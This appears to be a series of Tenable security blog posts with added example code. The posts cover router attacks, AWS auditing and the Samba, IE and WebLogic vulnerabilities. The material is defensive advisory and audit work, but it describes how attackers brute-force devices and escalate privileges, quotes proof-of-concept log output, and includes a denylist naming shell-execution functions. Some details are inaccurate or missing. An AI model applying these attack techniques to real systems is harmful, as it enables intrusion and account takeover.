Reasonable – Not every city and county will have the time or resources to implement every single smart city initiative. It just won’t happen. The reasonable path is to ensure the risk of threats is never greater than the pace of implementation.  

Time-Specific – In the digital age, a year is what five years used to be. Moore’s law is still in effect, and digital progress is not slowing down. However, local government remains first and foremost a provider of services at the most basic level: power, water, sanitation and transportation, to name a few. Those have not changed. The challenge is to ensure that digital transformation time frames don’t shift the focus from the provisioning of services to the completion of digital transformation. That would be exactly what the threat actors want – and the resulting disruption could fracture the public trust for years.

For more information about how to address the expanding attack surface, join us at GovEdge on May 3.

Register for GovEdge now!

Tenable Pledges to Fight Global Cyberattacks with 33 Leading Companies


In today’s digital economy, it has become paramount for companies to defend customers from malicious attacks by criminal enterprises and nation states.

This is why Tenable, along with 33 other companies including Microsoft, DocuSign and LinkedIn, has signed the Cybersecurity Tech Accord. This pledge is a pact among the largest-ever group of tech and cybersecurity companies to fight cyberattacks and improve foundational cyber hygiene at all levels.

Cybersecurity Tech Accord: the four pillars

The four pillars of the pact represent key areas that we have pledged to improve:

  • Stronger defense – Companies will mount a stronger defense against cyberattacks.
  • No offense – Companies will not assist governments in launching cyberattacks and will protect against the exploitation of products through every stage.
  • Capacity building – Companies will do more to empower developers and the people and businesses who use their technology, helping them improve their capacity for protecting themselves.
  • Collective action – Companies will build on existing relationships and together establish new formal and informal partnerships with industry, civil society and security researchers.

Although Tenable has always been committed to helping organizations accurately understand and reduce their Cyber Exposure, we realize that no one company or technology will secure cyberspace.

Cybersecurity professionals have a collective responsibility to protect everyone online

The growing threat of cyberattacks and offensive cyber weapons endangers all of us, from consumers and private businesses to government agencies. As cybersecurity professionals, we have a social responsibility to protect everyone online and support foundational cyber hygiene practices among private citizens and organizations of all sizes. We’re committed to empowering organizations everywhere to understand and reduce their cybersecurity risk. That’s always been our mission as an organization, and this accord solidifies that commitment.

We believe collective action by local and global companies will help drive significant change and ensure a safer and more secure future. That begins by making cybersecurity top of mind.

For more information about the Tech Accord, visit: www.cybertechaccord.org


Surge of Attacks Targeting Network Infrastructure Devices – What You Need to Know


Based on the recent surge of attacks on network devices by Russian state-sponsored cyber actors, the US-CERT has released Technical Alert (TA18-106A). As of now, targets are primarily government and private-sector organizations, critical infrastructure providers and the internet service providers (ISPs) that support U.S. infrastructure. Tenable has warned about such attacks before, including as recently as last week.

Impact assessment

Network devices are ideal targets because all traffic must traverse these critical devices. Organizations that use legacy, unencrypted protocols to manage hosts and services make successful credential harvesting easy for cyber actors. An attacker who has gained access to an organization’s gateway router can monitor, modify and deny traffic to and from the device. Simply put, whoever controls the router controls the data flowing through it.

According to US-CERT, Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of internet address spaces. Broad scanning helps attackers identify enabled internet-facing ports and services, conduct device fingerprinting and discover vulnerable network infrastructure devices. Vulnerable protocols targeted in this scanning include:

  • Telnet (port 23)
  • HTTP (port 80)
  • SNMP (port 161/162)
  • SMI (port 4786)

Beyond reconnaissance, an attacker who gains control of a router between Industrial Control Systems/Supervisory Control and Data Acquisition (ICS-SCADA) sensors and the controllers in critical infrastructure, such as the energy sector, can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction.

Vulnerability details

For several years now, cyber actors have been targeting and exploiting enterprise-class and SOHO/residential routers and switches worldwide. Many times, cyber actors do not need to leverage zero-day vulnerabilities or install malicious software to exploit these devices. Instead, these cyber actors rely on legacy, weak protocols and services associated with network administrative activities.

Network devices like routers and switches are often easy targets because they’re typically not maintained to the same standard as other devices, such as desktops and servers. Many times, default accounts and passwords are not changed, firmware is not updated and devices are not hardened. Devices such as SOHO and residential routers are most vulnerable. Once compromised, they can be used to pivot to other devices.

These weak security practices may enable cyber actors to:

  • Identify vulnerable devices
  • Extract device configurations
  • Map internal network architectures
  • Harvest login credentials
  • Masquerade as privileged users

Additionally, cyber actors may be able to modify device firmware, operating systems and configurations as well as copy, modify, deny or redirect traffic. Often, these cyber actors are successful because the devices:

  • Have legacy unencrypted protocols or unauthenticated services running
  • Have not been sufficiently hardened or are no longer supported (EOL)
  • Have not been updated or patched

All these factors give cyber actors the ability to potentially gain both intermittent and persistent access to critical infrastructure.

Exploitation

In many cases, exploitation begins with a brute force attack against Telnet and SSH to obtain login credentials. Weak and commonly used passwords or passwords that have previously been harvested by illicit activities are used for exploitation. However, if default accounts exist, credentials can be easily obtained, which will give full access to these devices. Password hashes may also be extracted from configurations via Simple Network Management Protocol (SNMP) and Cisco Smart Install (SMI) enabled device scanning.

Urgently required actions

Tenable suggests analyzing the network to determine whether any of the specific services listed below are running and/or ports are open. Refer to the vendor-specific guidance for the make and model of network devices in operation.

The US-CERT recommends that all organizations take the following actions:

  • Do not allow unencrypted (i.e., plain text) management protocols (e.g., Telnet) to enter an organization from the internet. When encrypted protocols such as SSH, HTTPS or TLS are not possible, management activities from outside the organization should be done through an encrypted VPN where both ends are mutually authenticated.
  • Do not allow internet access to the management interface of any network device. The best practice is to block internet-sourced access to the device management interface and restrict device management to an internal trusted and whitelisted host or LAN. If access to the management interface cannot be restricted to an internal trusted network, restrict remote management access via encrypted VPN capability where both ends are mutually authenticated. Whitelist the network or host from which the VPN connection is allowed, and deny all others.
  • Disable legacy unencrypted protocols such as Telnet and SNMPv1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMPv3. Harden the encrypted protocols based on current best security practices. DHS strongly advises owners and operators to retire and replace legacy devices that cannot be configured to use SNMPv3.
  • Immediately change default passwords and enforce a strong password policy. Do not reuse the same password across multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication, and implement two-factor authentication based on public-private keys. See NCCIC/US-CERT TA13-175A – Risks of Default Passwords on the Internet, last revised October 7, 2016.

Further detailed information can be found in the ‘Solution’ and ‘General Mitigation’ sections of the US-CERT Alert (TA18-106A).
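As an added illustration of the hygiene checks above (example code written for this page, not Tenable's plugins or US-CERT's tooling), the following Python audits a Cisco IOS-style running-config for plaintext management protocols, SNMPv1/v2c community strings, Smart Install and default or unencrypted passwords. The sample config and the rule set are constructed, and the code assumes the IOS conventions that Smart Install is disabled by an explicit `no vstack` line and that a vty without a `transport input` line may accept Telnet.

```python
"""Added example (not Tenable's or US-CERT's code): audits a Cisco IOS-style
running-config for the legacy management services called out in TA18-106A.
The sample config and the rule set are constructed for this demonstration."""
import re

# Constructed sample running-config exhibiting several of the weaknesses.
SAMPLE_CONFIG = """\
hostname edge-rtr
no service password-encryption
enable password cisco123
username admin password 0 admin
ip http server
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 transport input telnet ssh
 login local
line vty 5 15
 transport input ssh
 login local
"""

# Each rule: (finding id, regex matched against the start of one config line).
LINE_RULES = [
    ("snmp-v1v2c-community", r"snmp-server community \S+"),         # SNMPv1/v2c in use
    ("default-snmp-community", r"snmp-server community (public|private)\b"),
    ("http-management", r"ip http server$"),                       # plaintext port 80 UI
    ("passwords-cleartext", r"no service password-encryption$"),
    ("enable-password-not-secret", r"enable password "),
    ("user-password-not-secret", r"username \S+ password "),       # type 0/7, not 'secret'
]


def _vty_blocks(lines):
    """Yield (header, indented child lines) for every 'line vty' section."""
    header, block = None, []
    for ln in lines + ["!"]:                      # sentinel flushes the last block
        if ln.startswith(" ") and header:
            block.append(ln.strip())
            continue
        if header:
            yield header, block
        header, block = (ln if ln.startswith("line vty") else None), []


def audit_ios_config(config_text):
    """Return (finding id, evidence) pairs for weak settings in the config."""
    lines = [ln.rstrip() for ln in config_text.splitlines()]
    findings = [(fid, ln) for ln in lines for fid, rx in LINE_RULES if re.match(rx, ln)]
    # Assumption: Smart Install (SMI, TCP 4786) is on by default on supporting
    # switches and only appears in the config as 'no vstack' once disabled.
    if "no vstack" not in lines:
        findings.append(("smart-install-not-disabled", "no 'no vstack' line present"))
    for header, body in _vty_blocks(lines):
        transports = [b for b in body if b.startswith("transport input")]
        # Assumption: no 'transport input' line means the platform default, which may allow Telnet.
        if not transports or any("telnet" in t or t.endswith(" all") for t in transports):
            findings.append(("telnet-on-vty", header))
    return findings


def finding_ids(config_text):
    """Convenience: the distinct finding ids for a config, sorted."""
    return sorted({fid for fid, _ in audit_ios_config(config_text)})
```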

Identifying affected systems

Tenable has pre-existing detection via these Nessus plugins:

Get more information

Cyber Exposure Meets Political Practicality


CyberScoop’s Opportunities for Improving Cybersecurity Visibility at State & Local Government Agencies is an outstanding summary of the current state of cyber preparedness in state and local government agencies. Like most survey summaries, it presents the results as cold, hard facts. It is also, in some respects, comparative, not unlike the study of comparative politics.

In analyses of any subject related to IT in the state and local government sector, there are always unconscious comparisons to the private sector. The question many people ask when they encounter statistics related to state and local government is: “Why can’t the state (or city, or county) be run more like a business?”

The truth is that government – especially state and local government – can be more businesslike, but it will never be run like a business. The reason is political practicality.

There is one federal government, 50 state governments, 3,800 county governments and more than 18,000 local governments. As you move down that continuum, the amount of citizen (read: voter) involvement increases exponentially. Political practicality dictates that constituent issues be addressed with greater velocity as the size of the government entity gets smaller. This greatly affects the ability for government to address broader issues like cybersecurity. It also means that a greater proportion of the limited government funds are used to address the most pressing constituent issues, which leaves less for the IT line items.

Looking at the results of the recently released CyberScoop survey, Opportunities for Improving Cybersecurity Visibility at State & Local Government Agencies, through the lens of political practicality puts it in clearer context and suggests how the private sector can better assist state and local governments in improving their cyber hygiene and their Cyber Exposure posture. Let’s look at some of the findings:

“Half of state and local IT leaders face a shortage of skilled cybersecurity talent.”

Cyber analysts don’t put out fires, get cats out of trees or drive police cars and make arrests. The vast majority of city revenues go toward public safety. So, let’s put cybercrimes under the jurisdiction of the chief of police. This would certainly make it easier to request and appropriate funds. It would also make those jobs more attractive to those who want to work in local government to “serve and protect.” The private sector can create “weaponized” cyber tools for the exclusive use of local law enforcement.

“The findings clearly suggest a widespread, if not urgent, need for tools that can provide real-time situational awareness across a variety of networks.”

In the hierarchy of IT funding in state and local government, tools are always going to be underfunded because they don’t involve people doing things. It’s that simple: Local constituents see people – “feet on the street” – as the solution to local issues. Creating SaaS applications that minimize investment is critical to correcting this under-investment. Cooperatives of states or cities throughout a region are common, and a “cyber cooperative” would be a logical extension of that concept. For example, Southeastern Georgia has a “Cybersecurity District” that allows governments to pool cybersecurity resources.

“Adding to that challenge is the lack of control those officials have over systems and devices operating beyond their security infrastructure, including third-party contractors.”

Political winds change often, especially when new administrations come in with mandates to address specific issues. This often leads to IT builds that are purportedly “platform agnostic,” but also “disintegrated.” This “disintegrated” set of solutions creates an expanded cyberattack surface by increasing the number of patches and upgrades necessary to ensure compliance with standards. Suggesting a “cyber integrator” model that provides both tools and professional services to address this concern would be a breakthrough for local CIOs, especially. Adding the need to integrate – in advance – each new IT initiative with existing Cyber Exposure tools and approach would be a game-changer. It would likely require statutory or local ordinance enforcement, but it would create consistency in the ever-changing political landscape.

For a full look at the survey results, download the CyberScoop report today.

How to Secure and Audit an Amazon Web Services Three-tier Web Architecture


In 2016, Tenable was the first Center for Internet Security (CIS) member to receive certification for the Amazon AWS Foundations benchmark. We’re pleased to announce that we’ve continued our leadership in orchestrating compliance for Amazon Web Services (AWS) environments by becoming the first and only vendor to obtain CIS certification for the AWS Three-tier Web Architecture benchmark.

AWS Three-tier Web Architecture overview

There are numerous considerations when you’re contemplating building an AWS web architecture in the AWS cloud. One popular pattern to use is an AWS three-tier architecture consisting of internet, application and database tiers. The internet tier, or web tier, contains the web servers necessary to drive functionality from the application tier. The application tier represents the user components, and the data tier consists of storage media which hold the data relevant to the application. Tenable.io® and the CIS benchmark assist customers with compliance and improve their overall security for an AWS Three-tier architecture.

Why audit an AWS Three-tier Web Architecture?

CIS security benchmarks give organizations a baseline for securing resources and products. AWS is at the forefront of cloud computing services. Given the complexities of the cloud, this benchmark, together with Tenable.io, helps customers seeking to secure their overall AWS security posture. A secure AWS architecture is vital to an organization’s security hygiene. One example setting in the benchmark is enabling encryption at rest within Relational Database Service (RDS). Without this configuration, an organization risks the confidentiality of the data stored in RDS.

In today’s security landscape filled with data transformation, it’s paramount to protect and audit your AWS environment. Tenable customers now have the ability to continue closing their Cyber Exposure gap by auditing their AWS Three-tier Web Architecture based upon the CIS benchmark.

CIS Amazon Web Services Three-tier Web Architecture Benchmark

CIS released the AWS Three-tier Web Architecture Benchmark on the heels of the latest CIS AWS Foundations Benchmark update. The Three-tier Architecture Benchmark expands on the security configurations found in the Foundations Benchmark; it’s recommended that the Foundations Benchmark configurations be applied before completing the security settings in the Three-tier Web Architecture Benchmark. The following services are within the scope of the benchmark:

  • Elastic Compute Cloud (EC2) - API Version 2016-04-01
  • Virtual Private Cloud (VPC) - API Version 2016-04-01
  • Identity and Access Management (IAM) - API Version 2010-05-08
  • AWS Config - API Version 2014-11-12
  • CloudFront CDN - API Version 2016-01-13
  • CloudWatch - API Version 2010-08-01
  • Amazon Relational Database Service (RDS) - API Version 2014-10-31
  • Simple Notification Service (SNS) - API Version 2010-03-31
  • AWS Certificate Manager (ACM) - API Version 2015-12-08
  • Key Management Service (KMS) - API Version 2014-11-01

The benchmark is divided into multiple sections:

Data protection

Data protection provides the security configurations necessary for protecting data that’s in transit and at rest. Key recommendations include:

  • Ensuring databases running on RDS and all EBS volumes are encrypted
  • Elastic Load Balancers (ELBs) have the appropriate SSL certificate and use an HTTPS listener
  • All S3 buckets have secure policies enabled that require encryption for objects stored in buckets

Identity and access management

Identity and access management expands on the Identity and Access Management (IAM) section found in the Foundations benchmark. It builds upon the level of security for identification and access to the different AWS resources:

  • Ensuring IAM policies exist for the EC2 IAM roles
  • AutoScaling Group Launch-Configurations are configured appropriately
  • SNS Topics do not allow the “Everyone” group to publish and subscribe

Business continuity

In today’s world, cybersecurity concerns and business continuity are inseparable. This section provides recommendations to help organizations build an effective AWS resiliency plan:

  • Auto-Scaling Groups are associated with an ELB and are configured for multiple Availability Zones (AZs)
  • Amazon Machine Images (AMIs) are configured for the Auto-Scaling Launch Configuration
  • RDS backup retention policies are set in place

Event monitoring and response

Event monitoring and response builds off the Foundations Benchmark and includes detecting and responding to AWS events:

  • SNS topics include appropriate notification for CloudWatch alarms
  • RDS event subscriptions are enabled
  • CloudWatch alarms are created for logs

Audit and logging

Continuing from the auditing and logging section of the Foundations Benchmark, this section provides the configurations necessary to support auditing AWS:

  • Logging for ELB and CloudFront is enabled
  • CloudWatch log groups are created
  • Config rules for encrypted volumes are applied
  • Config rules check that EIPs are attached to EC2 instances

Networking

The networking section adds recommendations that provide security for the default virtual private cloud (VPC):

  • Enable CloudFront content distribution network
  • Ensure subnets are configured for each tier
  • Routing tables have the default route defined to allow connection to the VPC gateway
  • ELB Security Group is configured to accept HTTPS only
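As an added example (not Tenable's, CIS's or AWS's code), the following Python evaluates a few of the recommendations above, RDS encryption at rest, ELB HTTPS listeners, bucket policies that require encrypted uploads and SNS topics open to “Everyone”, against inventory shaped like the boto3 responses named in each function. All sample values are constructed, and the S3 check assumes encryption is enforced by a Deny on s3:PutObject with a Null condition on the s3:x-amz-server-side-encryption key.

```python
"""Added example (not Tenable's or CIS's code): evaluates a few CIS AWS Three-tier
Web Architecture recommendations against inventory data shaped like the boto3
responses named in each check. Every sample value below is constructed."""
import json


def _as_list(value):
    """IAM policy fields may be a single string or a list of strings."""
    return value if isinstance(value, list) else [value]


def check_rds_encrypted(db_instances):
    """Data protection: RDS storage must be encrypted at rest.
    Input mimics rds.describe_db_instances()["DBInstances"]."""
    return [db["DBInstanceIdentifier"] for db in db_instances
            if not db.get("StorageEncrypted", False)]


def check_elb_https_listener(load_balancers):
    """Data protection: each classic ELB needs an HTTPS listener with a certificate.
    Input mimics elb.describe_load_balancers()["LoadBalancerDescriptions"]."""
    failing = []
    for lb in load_balancers:
        listeners = [d["Listener"] for d in lb.get("ListenerDescriptions", [])]
        if not any(l.get("Protocol") == "HTTPS" and l.get("SSLCertificateId")
                   for l in listeners):
            failing.append(lb["LoadBalancerName"])
    return failing


def check_s3_requires_encryption(bucket_policies):
    """Data protection: the bucket policy must deny s3:PutObject when the SSE
    header is absent. Input maps bucket -> s3.get_bucket_policy()["Policy"]."""
    failing = []
    for bucket, policy_json in bucket_policies.items():
        statements = _as_list(json.loads(policy_json).get("Statement", []))
        enforced = any(
            s.get("Effect") == "Deny"
            and "s3:PutObject" in _as_list(s.get("Action", []))
            and str(s.get("Condition", {}).get("Null", {})
                    .get("s3:x-amz-server-side-encryption")).lower() == "true"
            for s in statements)
        if not enforced:
            failing.append(bucket)
    return failing


def check_sns_not_public(topic_policies):
    """IAM: no topic may let "Everyone" publish or subscribe. Input maps topic
    ARN -> sns.get_topic_attributes()["Attributes"]["Policy"]."""
    failing = []
    for arn, policy_json in topic_policies.items():
        for s in _as_list(json.loads(policy_json).get("Statement", [])):
            principal = s.get("Principal")          # "*" or {"AWS": "*"} means Everyone
            principals = principal.values() if isinstance(principal, dict) else [principal]
            actions = {a.lower() for a in _as_list(s.get("Action", []))}
            if (s.get("Effect") == "Allow"
                    and any("*" in _as_list(p) for p in principals)
                    and actions & {"sns:publish", "sns:subscribe", "sns:*"}):
                failing.append(arn)
                break
    return failing


def audit(inventory):
    """Run every check; returns {check name: [failing resource ids]}."""
    return {
        "rds_encrypted": check_rds_encrypted(inventory["db_instances"]),
        "elb_https_listener": check_elb_https_listener(inventory["load_balancers"]),
        "s3_requires_encryption": check_s3_requires_encryption(inventory["bucket_policies"]),
        "sns_not_public": check_sns_not_public(inventory["topic_policies"]),
    }


# Constructed sample inventory: one compliant and one failing resource per check.
_DENY_UNENCRYPTED = {"Effect": "Deny", "Principal": "*", "Action": "s3:PutObject",
                     "Resource": "arn:aws:s3:::assets-bucket/*",
                     "Condition": {"Null": {"s3:x-amz-server-side-encryption": "true"}}}
SAMPLE_INVENTORY = {
    "db_instances": [{"DBInstanceIdentifier": "app-db", "StorageEncrypted": True},
                     {"DBInstanceIdentifier": "legacy-db", "StorageEncrypted": False}],
    "load_balancers": [
        {"LoadBalancerName": "web-elb", "ListenerDescriptions": [{"Listener": {
            "Protocol": "HTTPS", "LoadBalancerPort": 443,
            "SSLCertificateId": "arn:aws:acm:us-east-1:111122223333:certificate/EXAMPLE"}}]},
        {"LoadBalancerName": "http-only-elb", "ListenerDescriptions": [{"Listener": {
            "Protocol": "HTTP", "LoadBalancerPort": 80}}]}],
    "bucket_policies": {"assets-bucket": json.dumps({"Statement": [_DENY_UNENCRYPTED]}),
                        "logs-bucket": json.dumps({"Statement": []})},
    "topic_policies": {
        "arn:aws:sns:us-east-1:111122223333:alarms": json.dumps({"Statement": [{
            "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
            "Action": ["SNS:Publish", "SNS:Subscribe"], "Resource": "*"}]}),
        "arn:aws:sns:us-east-1:111122223333:open": json.dumps({"Statement": [{
            "Effect": "Allow", "Principal": "*", "Action": "SNS:Subscribe", "Resource": "*"}]})},
}
```

Running `audit(SAMPLE_INVENTORY)` reports the one failing resource under each check; an empty list for a check means every sampled resource satisfied it.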

How to audit AWS Three-tier Architecture with Tenable using the CIS benchmark

To get started, log into Tenable.io and create a new Audit Cloud Infrastructure scan. In your scan configuration, select the Compliance tab. Under Amazon AWS, CIS Amazon Web Services Three-tier Web Architecture Benchmarks are now available. Due to AWS flexibility, the audit utilizes variables to ensure the checks are specific to your environment.

Audit Cloud Infrastructure

Once the configuration is saved, run the scan and review the results. Below is sample output from a scan.

CIS AWS

Below is a closer view of one of the results. This page shows:

  • Pass/fail status
  • Remediation steps, if necessary
  • Individual results from the systems scanned
  • Reference information to cybersecurity frameworks

See Also

Reduce your Cyber Exposure gap

We can help you reduce your organization's Cyber Exposure gap. One way of orchestrating this is by continuously updating our compliance audits and obtaining CIS certifications.

With Tenable.io, you can gain full visibility and maintain compliance across many public cloud infrastructures. In addition to AWS compliance scanning, Tenable offers solutions for Microsoft Azure, Rackspace and OpenStack. Start your free, 60-day Tenable.io trial now.

April Vulnerability of the Month: Password Free-for-All Via Samba Active Directory Domain Controller Vulnerability


Every month, we ask our researchers to nominate a vulnerability of the month. Novelty, sophistication or just plain weirdness are some of the potential criteria for selecting a vulnerability of the month. After the nominations are collected, the candidates are shortlisted and voted on by our 70-plus-member research organization, combining the total experience and knowledge of Tenable Research to identify the vulnerability of the month.

Background

In mid-March, Samba released an advisory on two critical vulnerabilities. One of these, CVE-2018-1057, allows unprivileged users to change any user password including privileged service and admin user accounts. Researcher Björn Baumbach from SerNet is credited with discovering this vulnerability.

What makes this the vulnerability of the month?

Samba administrators were likely eager to mitigate this vulnerability in mid-March based on the serious implications of CVE-2018-1057 and the other vulnerability included in the patch release. Samba is free, open-source software for file and print services that helps integrate Linux/Unix servers and desktops into Active Directory environments. These qualities have made Samba very popular with widespread prevalence, meaning any vulnerabilities in Samba have potentially wide-reaching impact. One common application of Samba is to provide file and printer sharing services for Linux-based network attached storage (NAS) and storage area network (SAN) systems. Samba file servers can store diverse data, including sensitive data, personally identifiable information and intellectual property.

CVE-2018-1057, in particular, has both accidental and malicious implications. On the accidental, potentially mischievous side, authenticated users could change their coworkers’ passwords, locking them out as a fun office prank.

More seriously, malicious attackers who have gained any legitimate credentials, for example via social engineering, can change the passwords of admin and domain controller accounts and thereby take control of them, escalating their privileges. Using a simple phishing campaign, coupled with this vulnerability, an attacker could navigate through targeted environments horizontally and vertically throughout the organization with minimal effort.

However, attackers don’t have to rely on social engineering or phishing to leverage this vulnerability. Once a machine has been compromised, it can be leveraged to interact with Samba Active Directory Domain Controller (AD DC) and allow the attacker to access accounts with similar or increased permissions.

Vulnerability details

According to the advisory, in all versions of Samba AD DC from 4.0.0 onward, the Lightweight Directory Access Protocol (LDAP) server incorrectly validates permissions to change passwords. This allows authenticated users to change other users' passwords, including administrative users and DCs.

The advisory specifies that “the LDAP server incorrectly validates certain LDAP password modifications against the ‘Change Password’ privilege, but then performs a password reset operation.”

Samba released a patch for Samba versions 4.7.6, 4.6.14 and 4.5.16 and outlined a few workarounds, including revoking change password rights “for 'the world' from all user objects (including computers) in the directory, leaving only the right to change a user's own password.”

Additional resources

Why Are You Still Using IE? Double Kill Is Just the Latest Issue


Microsoft's legacy browser Internet Explorer (IE) has been used for almost three decades, but not without issues. IE has been so plagued with security problems that Microsoft built a new, more secure browser called Edge. But there are still some issues. Edge’s forward-leaning technology doesn’t support some of IE’s legacy capabilities. For that reason, IE still comes installed on all Windows operating systems. So, once again, IE has been exploited by attackers, as discovered and observed in the wild by the Chinese security firm Qihoo 360. They’re calling this new zero-day vulnerability Double Kill. The firm believes this is an advanced persistent threat (APT) aimed at achieving ongoing access to targeted systems.

Impact assessment

Technical details and a proof of concept (PoC) have not been released at this time. However, Qihoo 360 has stated that Double Kill involves an IE vulnerability that uses Microsoft Word documents (usually sent as email attachments) as the attack vector. Qihoo 360 also states that the document contains shellcode of an unspecified kind. Internet Explorer is opened as a background process, which leads to an executable being downloaded and run without any visible warning to the user. Opening malicious documents with Double Kill allows attackers to control victims’ computers without their knowledge, making ransomware infection, eavesdropping and data leakage convenient and stealthy.

Vulnerability details

These types of attacks typically begin with spear phishing attempts, a type of email-spoofing attack that targets specific organizations or individuals. If successful, an individual may unknowingly activate malware embedded within attached Word documents, believing they are from a trusted source. In many attack scenarios, attackers get in and get out quickly to avoid detection. With an APT, the goal of the attacker is to achieve ongoing access.

Exploitation

The Word document in question doesn't download to the computer automatically; it requires interaction on the part of the user. Users must be on IE, and they must open the infected file, which then launches a malicious webpage. The malware then uses a User Account Control (UAC) bypass and file steganography, the embedding of a file, message or image within another file, message or image.

Urgently required actions

Stop using IE. Microsoft has not released a statement or any patches at this time. If, for some reason, you need to continue using IE, follow IT security best practices.

Tenable® has developed several Nessus® and NNM plugins for IE, which can help you discover, identify and assess potential vulnerabilities in the legacy browser.

Get more information:

Critical Oracle WebLogic Server Flaw Still Not Patched


One of the many issues that should have been addressed by Oracle’s Critical Patch Update for April 2018 was a fix for a flaw affecting versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 of the Oracle WebLogic Server (WLS) Java Enterprise Edition (EE) application server. This vulnerability, which has been assigned CVE-2018-2628 (CVSS Base Score: 9.8), is a critical issue that can be exploited by an attacker with network access via the T3 protocol. The T3 protocol is used to transport information between WebLogic servers and other types of Java programs. However, the patch was unsuccessful and this issue can still be exploited.

Impact assessment

With the recent discovery of the Oracle vulnerability, attackers are scanning the internet for Oracle WLS installations on Transmission Control Protocol (TCP) port 7001 to exploit. Once discovered, a remote attacker can target an Oracle WLS system and may execute arbitrary commands.

Vulnerability details

Exploitation

This vulnerability is nothing new. WebLogic has been affected by a number of Java deserialization vulnerabilities since FoxGlove Security published their wonderful article, “What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.” In fact, Tenable® has released five different research advisories regarding deserialization attacks over T3:

  1. https://www.tenable.com/security/research/tra-2016-09
  2. https://www.tenable.com/security/research/tra-2016-21
  3. https://www.tenable.com/security/research/tra-2016-33
  4. https://www.tenable.com/security/research/tra-2017-07
  5. https://www.tenable.com/security/research/tra-2017-16

WebLogic’s T3 protocol relies on serialized Java objects for communication, making it particularly vulnerable to this bug class. Serialization converts an object into a byte stream so it can be stored or transported; deserialization rebuilds the object from that stream. When a program deserializes untrusted serialized Java objects, the sender chooses which classes are instantiated and with what field values, so the serialized objects can control code flow and eventually take over execution entirely. Oracle hasn’t done themselves any favors by choosing to “fix” these attacks by creating a list of objects that can’t be deserialized (also known as a blacklist).

Figure: A View of WebLogic’s Blacklist Construction

Before you panic, though, let’s look at what CVE-2018-2628 actually is. This vulnerability is a blacklist bypass: an attacker can sidestep the blacklist to deserialize any object on the target classpath. And that’s the catch. Oracle has done a good job of mitigating all the publicly disclosed Java deserialization RCE gadgets, so even though Oracle’s patch for CVE-2018-2628 is ineffective, a patched server may not be vulnerable to remote code execution (RCE) in all cases.
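The difference between a blacklist and an allowlist is easiest to see in code. The snippet below is an added illustration, not Oracle’s or Tenable’s code, and it transposes the point from Java object streams to Python’s pickle, whose Unpickler.find_class hook is the equivalent of the class-resolution step a Java ObjectInputStream performs: an allowlist unpickler resolves only the one class the consumer expects, while a blacklist unpickler resolves anything not explicitly named, which is exactly the gap a bypass lands in. The Order class, the harmless OrderedDict standing in for “any object on the classpath” and the denylist entries are all constructed for the example.

```python
"""Allowlist vs. blacklist deserialization, shown with Python's pickle.
Added illustration transposed from the WebLogic/Java discussion; not vendor code."""
import collections
import io
import pickle
from dataclasses import dataclass


@dataclass
class Order:
    """The one type this consumer legitimately expects to receive (constructed)."""
    item: str
    qty: int


# Allowlist: only the class the consumer actually expects may be resolved.
ALLOWED_GLOBALS = {(Order.__module__, Order.__qualname__)}

# Blacklist, the approach the post criticizes: a few names known to be dangerous.
# Placeholder entries for the example; the point is that anything NOT listed resolves.
DENIED_GLOBALS = {("subprocess", "Popen"), ("os", "system")}


class AllowlistUnpickler(pickle.Unpickler):
    """Refuses every global reference that is not explicitly permitted."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}: not on the allowlist")


class BlacklistUnpickler(pickle.Unpickler):
    """Refuses only the names somebody thought to enumerate; everything else resolves."""

    def find_class(self, module, name):
        if (module, name) in DENIED_GLOBALS:
            raise pickle.UnpicklingError(f"refused global {module}.{name}: blacklisted")
        return super().find_class(module, name)


def load_with_allowlist(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def load_with_blacklist(data: bytes):
    return BlacklistUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    """Runs both unpicklers over an expected and an unexpected object; returns what happened."""
    expected = pickle.dumps(Order("widget", 3))
    # A harmless but unexpected class stands in for "any object on the classpath".
    unexpected = pickle.dumps(collections.OrderedDict(a=1))

    results = {"allowlist_accepts_expected": load_with_allowlist(expected) == Order("widget", 3)}
    try:
        load_with_allowlist(unexpected)
        results["allowlist_rejects_unexpected"] = False
    except pickle.UnpicklingError:
        results["allowlist_rejects_unexpected"] = True
    # The blacklist never heard of OrderedDict, so it resolves it without complaint.
    results["blacklist_resolves_unexpected"] = isinstance(
        load_with_blacklist(unexpected), collections.OrderedDict
    )
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

Java has the same allowlist mechanism in ObjectInputFilter (JEP 290), and the design lesson is the same on both platforms: enumerate what you expect and refuse the rest, because a denylist is only as complete as the last gadget someone published.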

For example, take a look at the proof of concept on Exploit-DB. When you run it against 12.2.1.3, you’ll find this output in the WebLogic log:

<Apr 30, 2018 8:23:49,869 AM PDT> <Warning> <RMI> <BEA-080003> <A RuntimeException was generated by the RMI server: weblogic.common.internal.RMIBootServiceImpl.authenticate(Lweblogic.security.acl.UserInfo;)
java.lang.ClassCastException: com.sun.proxy.$Proxy160 cannot be cast to weblogic.rjvm.ClassTableEntry.
java.lang.ClassCastException: com.sun.proxy.$Proxy160 cannot be cast to weblogic.rjvm.ClassTableEntry
    at weblogic.rjvm.MsgAbbrevInputStream.readClassDescriptor(MsgAbbrevInputStream.java:423)
    at weblogic.utils.io.ChunkedObjectInputStream$NestedObjectInputStream.readClassDescriptor(ChunkedObjectInputStream.java:288)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1855)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1749)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2040)
Truncated. see log file for complete stacktrace

This log shows that the initial connect-back was successfully deserialized. However, because ysoserial (a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization) is configured to use the CommonsCollections1 gadget chain, the attacker can’t achieve RCE: the object that allowed RCE in the past can no longer be serialized or deserialized.

Oracle removed the vulnerable Apache Commons Collections from the classpath in 2017.

